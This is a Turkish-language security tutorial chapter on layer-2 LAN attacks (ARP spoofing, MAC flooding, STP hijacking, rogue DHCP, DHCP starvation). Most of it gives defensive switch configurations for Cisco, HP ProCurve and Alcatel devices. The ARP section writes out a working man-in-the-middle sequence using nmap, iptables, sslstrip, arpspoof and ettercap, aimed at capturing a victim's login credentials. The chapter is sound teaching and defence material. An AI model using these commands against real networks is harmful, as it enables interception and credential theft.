Yerel Ağlarda Gerçekleştirilen Saldırılar
11. Yerel Ağlarda Gerçekleştirilen Saldırılar
Genelde güvenlik önlemleri alınırken 2. katmandaki(osi Modeli) önlemler es geçilir.Ama 3. katmandaki ve diğer üst katmanlarda ki önlemlerin hiçbiri 2. katmandaki saldırıları önlemeyemez.Eğer son kullanıcıların olduğu kenar switchlerde gerekli önlemler alınmazsa çok basit ataklarla bile saldırgan hedefine oluşabilir. Bu yazıda 2. katmandaki saldırı türlerinden ve kenar switchlerde mutlaka alınması gereken en temel güvenlik önlemlerinden bahsedeceğim.
11.1 Man In The Mıddle Atağı (Arp Spoofing( ve Alınabilecek Önlemler
Arp Protokolü
Arp Protokolü yerel ağlarda bilgisayarların birbirleriyle iletişime geçmesi için kullanılan adres çözümleme protokolüdür.A bilgisayarı aynı ağda bulunan ve ip’si 192.168.10.10 olan B makinesi ile iletişime geçebilmesi için önce B bilgisayarının mac(fiziksel) adresini bilmesi gerekir .Bunun için networke broadcast paketler göndereek 192.168.10.10 ip’sine sahib bilgisayarı bulur bunu yaparkende arp request paketleri yollar B bilgisayarıda arp request paketine karşılık arp replay paketi gonderir.Ağdaki diğer bilgisayarlar 192.168.10.10 ip’si onlarda olmadığı için herhangi bir cevap dönmezler.Sonuçta A bilgisayarı 192.168.10.10 ip’sine sahib B bilgisayarının mac adresini öğrenir ve artık onunla iletişime geçebilir.
Eğer saldırganın bağlı olduğu switch’te(ağ anahtarlama cihazı) gerekli önlemler alınmamışsa saldırgan arp spoofing yaparak kurbanın trafiğini kendi üzerinden geçirebilir.
Saldırının gerçekleştirilme şekli:
Saldırgan ilk önce kurbanın bilgisayarına ağ geçidi ip’sini sanki kendi bilgisayarıymış gibi göstermek için kurbana gateway ip’sini kendi mac adresiyle eşleştiren arp replay paketlerini gönderir.Kurbanın bilgisayarında artık gateway ip’sine(ağ geçidi adresi) karşılık gelen mac bilgisi sldırganın mac adresi olur.
Nmap –T4 –A 192.168.246.024
#İlk once ağ’da tarama yaparak kurban seçeriz.
Echo 1 >> /prox/sys/net/ipv4/ip_forward
#Saldırıyı gerçekleştireceğimiz kali sunucuda routing açılır.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
iptables-save
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp –dport 80 -j REDIRECT –to-ports 10000
COMMIT
ssltstrip –a –k –f
#ssltrip ile ssl redirection yapan sitelerde kurban ile site arasına girilerek http’den https’e redirect edilmesini engellemiş oluruz.
#örnegin kurban face girdiğinde normalde https’e redirect olması gerekirken artık http’den geçer.
Eğer kurban kendisi elle https yazarak girerse araya girmemiş oluruz.Eğer 443 portunuda dinleyip onuda sslstripe yönlendirir isek bunun için kendi sertifikamızıza ekleyip bunu sslstrip komutunda belirtmemiz gerekir.
https trafiğinin arasına girsek bile kullanıcı https ile bağlanmaya çalışınca bizim kendi oluşturduğumuz sertifika ile bağlanacağı için hata alacaktır.Eğer kullanıcı bilinçli ise bu anormalliği fark edebilir.
arpspoof -i eth0 -t 192.168.246.132 192.168.246.2
#kurbana sanki 192.168.246.2(gateway) adresinden geliyormuş gibi arp-replay paketlerini göndeririz.Yani arp spoofing yaparak kurbana ağ geçidini olarak kendi mac adresimizi göndermiş oluruz ve yolladığı şifreleri elde etmiş olruz.
ARPSPOOF ÇALIŞTIRMADAN ÖNCE KURBANIN ARP TABLOSU
ARPSPOOF ÇALIŞTIRDIKTAN SONRA KURBANIN ARP TABLOSU
Dikkatli bakar iseniz MAC adresinin değiştiğini görüyor olacaksınız.
Ettercap –T –q –i eth0
#Ettercap programı ile kurbandan gelen trafiği sniff ederiz. Böylece clear text
Kurban facebook sitesine baglanıyor. Sslstrip programı sayesinde ssl redirect atlatılmış olur.
Sniff için kullandığımız ettercap programında kullanıcı ve şifreyi yakalıyor olacağız.
Son Kullanıcının Alacağı Önlemler
*kb-sslforce eklentisi chrome taraycısına eklenerek bizim için kritik olan ve sadece https trafiğinden ulaşılmasını istediğimiz banka veya vs siteleri bu eklentiye ekleyebiliriz.
Eklentiye KB SSL adresinden ulaşabilirsiniz.Eklentiyi yükledikten sonra istediğimiz domainler için https’i force ettirebiliriz.
*Varsayılan ağ gecidi için static arp kaydı eklersek eğer saldırganın arp-replay paketleri hiç bir işe yaramaz.
Ağ Yöneticilerin Alabileceği Önlemler
HP PROCURVE SWİTCH (DYNAMİC ARP PROTECTION)
Procurve switchlerde dynmic arp protection ile arp snooping ataklarından korunabiliriz.
İlk önce dhcp snoopiing aktif edilir.Dha sonra app-protect aktif edilir.Ve uygulamak istediğimiz vlan için eklenir.Arp protect aktif edilince tüm portlar varsayılan olarak untrusted seçilmiş olur.(Biz diğer switche bağlı olan portu trusted yaparız)arp-protect ile Untrusted yaptığımız porttan switche paket geldiğinde dhcp-snoop tablosuna bakarak ip-mac eşleştirmesi yapar ve eşleşmeyenleri drop eder.
Dhcp-snooping enable
arp-protect vlan 10
arp-protect trust 1
ALCATEL SWİTCH(PORT IP SOURCE FILTERING)
ip helper dhcp-snooping enable
ip helper dhcp-snooping port 1/1-10 trust
ip helper dhcp-snooping ip-source-filtering port 2/1-5 enable
#İlk önce switch bazında dhcp snoop özelliğiaktif edilir ve switchin taglı olan yani diğer switche bağlı olduğu #uplink portu trusted seçilir.Dğer portlar yani clientlerin bağlı olduğu portlar zaten varsayılanda client-onlt #(untrusted seçili gelir.Böylece uplink portu hariç diğer portlardan yani client portlarında dhcp server sunucusu #çalıştırılsa bile paketler(DHCPOFFER ,DHCPPACK VS) drop edilmiş olur.
#ip-source-filtering komutu ilede arp spoofing yapılmasını engellemiş oluruz.Bu komut ile artık dhcp snoop #client-only portlarından bir paket geldiğinde dhcp-snoop bind tablosuna bakılır ve eğer bu tablodaki ip-mac #eşleşmesi ile tutuyorsa paket geçirilir yoksa drop edilir.
ip helper dhcp-snooping binding timeout 1500
#binding timeout komutu ile bind tablosunun timeout olma süresini değiştirebiliriz.
CISCO SWİTCH(DYNAMIC ARP INSPECTION)
Cisco(config)#ip dhcp snooping vlan 53, 61
Cisco(config)#ip arp inspection vlan 53,61
Cisco(config)#interface GigabitEthernet 5/48
Cisco(config-if)#ip dhcp snooping trust
Cisco(config-if)#ip arp inspection trust
CISCO
Bir porttan belirlenen zaman aralığında max gelebilecek arp mesajı sayısını belirtebiliriz.Bu sayede arp dos saldırılarına engelleyebiliriz.
Cisco(config)#errdisable recovery cause arp-inspection
Cisco(config)#interface GigabitEthernet 6/12
Cisco(config-if)#ip arp inspection limit rate 25 burst interval 3
11.2 Mac Flood Atağı ve Alınabilecek Önlemler
İlk önce switchlerin çalışma şeklinden bahsetmek gerekirse; switchlerde clientlerın bağlı olduğu portlar ve uplink portları vardır.Her bir porta bağlı bulunan clientlerin mac bilgisi switchlerde bulunan mac tablosunda (CAM) tutulur.Switche bir paket geldiğinde mac adres tablosundan paketin hangi porta gideceğini bulur.Eğer saldırgan çok fazla sahte mac adresleri ile switchin mac tablosunu doldurursa switch artık hub gibi davranmaya başlar bu şekilde saldırgan switch üzerindeki tüm trafiği dinleyebilir.
ALINABİLECEK ÖNLEMLER
Switchler üzerinde clientlerin olduğu portlar için mac limiti belirleyerek saldırganların mac flood atağı yapmasını engelleyebilirsiniz.(mac adres kilitlemesi)
CISCO
Anahtar(config)#interface range GigabitEthernet 3/2 – 48
Anahtar(config-range)# switchport mode access
Anahtar(config-range)# switchport port-security
Anahtar(config-range)# switchport port-security maximum 3
Anahtar(config-range)# switchport port-security violation restrict
Anahtar(config-range)#switchport port-security mac-address sticky
ALVATEL SWİTCH
port-security 5/12-20 6/10-15 admin-status enable
port-security chassis convert-to-static
port-security 5/12-20 6/10-15 maximum 3
port-security 5/12-20 6/10-15 max-filtering 0
port-security 5/12-20 6/10-15 violation restrict
#maximum izin verilen mac adresi 3 olarak ayarlanabilir.
#restrict varsayılanda zaten gelen seçenektir istersek shutdown seçrek portun kapanmasınıda sağlayabiliriz.
#show port security komutu ile mevcut kuralları görüntüleyebiliriz.
HP ProCurve
hp (config)#port-security ethernet 1-10 address-limit 3 learn-mode static action send-disable
#Komut çalıştırıldığında mac switchteki mevcut mac adresleri öğrenilir ve porta clientler bağlandıkca bu mac #adreslerini kaydeder. 3. mac’ten sonra artık farklı mac adreslerini kabul etmez.Bu şekilde hub kullanımıda #engelleyebiliriz.
11.3 STP Protokolü Atakları ve Alınabilecek Önlemler
Spanning tree protokolü Layer 2 katmanında(osi modeli) çalışır ve varsayılanda açık gelen ve switchler arasındaki bağlantılarda oluşan loop’ları (sonsuz döngü) engeller.Networktteki switchlerimizin topolojisini oluştururken yedekli çalışacak ayarlayabiliriz.STP protokolü ise oluşan loopları ve bazı portları shutdown eder diğer bağlantılarda sorun olursa bu shutdown edilen port açılır.
STP protoklünün çalışma yapısından bahsedirsek:
Stp protokolü switchlerin bir ağaç yapısında çalışmasını sağlar ve bridgeid değeri en küçük olan switch root düğüm olarak seçilir.Saldırgan önce traifiği dinleyerek root switchin bridge değerini öğrenir .daha sonra networke program vasıtasıyla kendisini root switch seçtirecek BPDU paketlerini gönderir.Saldırgan BPDU frameleri içerisindeki bridge id değerini kök switch bridge id değeri ile aynı yapar ve kendi mac adresini kök anahtarın mac adresinden daha küçük bir mac adresi yapar.Bu çekilde kök switch yerine geçer.(Eğer saldırgan networke bridge id değeri 0 ve mac adreside 00:00:00:00:00 olacak iekilde BPDU farmeleri göderirse herhangi bir dinleme yapmasına gerek kalmaz direk root switch olur.)
Saldırgan root swtich olduktan sonra dilerse kendini ağdan çıkarıp bu işlemleri tekrar tekrar yapabilir.Böylece networkte sürekli kopma olur.
Alınabilecek Önlemler
ALVATEL SWİTCH
policy port group UserPorts 1/1-24 2/1-24 3/1 4/1
qos apply
qos user-port filter bdpu
qos apply
#Artık UserPorts grubundaki portlarından bpdu paketleri gelirse drop edilir.Eğer qos user-port shutdown bdpu kuralı girilirse o portlardan bpdu paketleri gelirse fiziksel port komple kapatılır.
CISCO SWİTCH
CISCO(config)#interface range fastethernet 7/ 2 – 46
CISCO(config-if-range)#spanning-tree rootguard
HP PROCURVe SWITCH
HP(config)#spanning-tree A1 – A20 root-guard
11.4 DHCP Starvation ve Sahte DHCP Sunucu Atakları ve Alınabilecek Önlemler
Sahte Dhcp Sunucu Atağı
İkinci katmanda(osi modeli) yapılabilecek saldırılarından biride SAHTE DHCP SUNUCU atağıdır.Saldırgan kendisi dhcp sunucu kurar ve kurbanlar saldırganın dhcp sunucusunu kullanırlar .saldırgan dhcp sunucu ile kurbannlara istedği dns ve gateway adresini verebilir.Böyelece sahte dhcp sunucu ile man in the middle (ortadaki adam) saldırısnı gerçekleştirmiş olur.Bunu önlemenin en kolay yöntemi switchler üzerinde dhcp snoop özelliğini aktif edip sadece diğer switchlere bağlanan uplink portlarını trusted port olarak tanımlamak yeterli olur.Bu ayarlardan sonra cllient-only(untrusted) portlardan gelen DHCPOFFEr ve DHCPACK paketleri drop edilir.
ALCATEL SWITCH 1. YÖNTEM
ip helper dhcp-snooping enable
ip helper dhcp-snooping port 1/1-10 trust
ALCATEL SWITCH 2. YÖNTEM
policy port group UserPorts 1/1-24 2/1-24 3/1 4/1
qos apply
qos user-port filter dhcpserver
qos apply
CISCO SWITCH
Cisco(config)#ip dhcp snooping vlan 20-51
Cisco(config)#interface GigabitEthernet 1/18 (DHCP sunucusunun bağlı olduğu port)
Cisco(config-if)#ip dhcp snooping trust
HP PROCURVE
ProCurve(config)#dhcp-snooping
ProCurve(config)#dhcp-snooping authorized-server 192.168.1.10
ProCurve(config)#dhcp-snooping trust a1-a20
ProCurve(config)#dhcp-snooping vlan 1-3
11.5 DHCP Sömürü Saldırısı
Bu saldırı türü dhcp sunucusunun çalışmasını engellemek için yapılan bir DOS(Denial of service) saldırısıdır.Saldırgan çok fazla sahte mac adresi üreterek dhcp sunucusunun ip havuzunu doldurur böyelece normal clientler networke bağlandığında dhcp sunucusunda ip alamaz.
Bu saldırıyı önlemenin yolu daha önce mac flood saldırılarına karşı kullandığımız mac adres kilitlemesi yöntemidir.
CISCO
Anahtar(config)#interface range GigabitEthernet 3/2 – 48
Anahtar(config-range)# switchport mode access
Anahtar(config-range)# switchport port-security
Anahtar(config-range)# switchport port-security maximum 3
Anahtar(config-range)# switchport port-security violation restrict
Anahtar(config-range)#switchport port-security mac-address sticky
ALCATEL SWITCH
port-security 5/12-20 6/10-15 admin-status enable
port-security chassis convert-to-static
port-security 5/12-20 6/10-15 maximum 3
port-security 5/12-20 6/10-15 max-filtering 0
port-security 5/12-20 6/10-15 violation restrict
#maximum izin verilen mac adresi 3 olarak ayarlanabilir.
#restrict varsayılanda zaten gelen seçenektir istersek shutdown seçrek portun kapanmasınıda sağlayabiliriz.
#show port security komutu ile mevcut kuralları görüntüleyebiliriz.
HP ProCurve
hp (config)#port-security ethernet 1-10 address-limit 3 learn-mode static action send-disable
#Komut çalıştırıldığında mac switchteki mevcut mac adresleri öğrenilir ve porta clientler bağlandıkca bu mac #adreslerini kaydeder. 3. mac’ten sonra artık farklı mac adreslerini kabul etmez.Bu şekilde hub kullanımıda engelleyebiliriz.
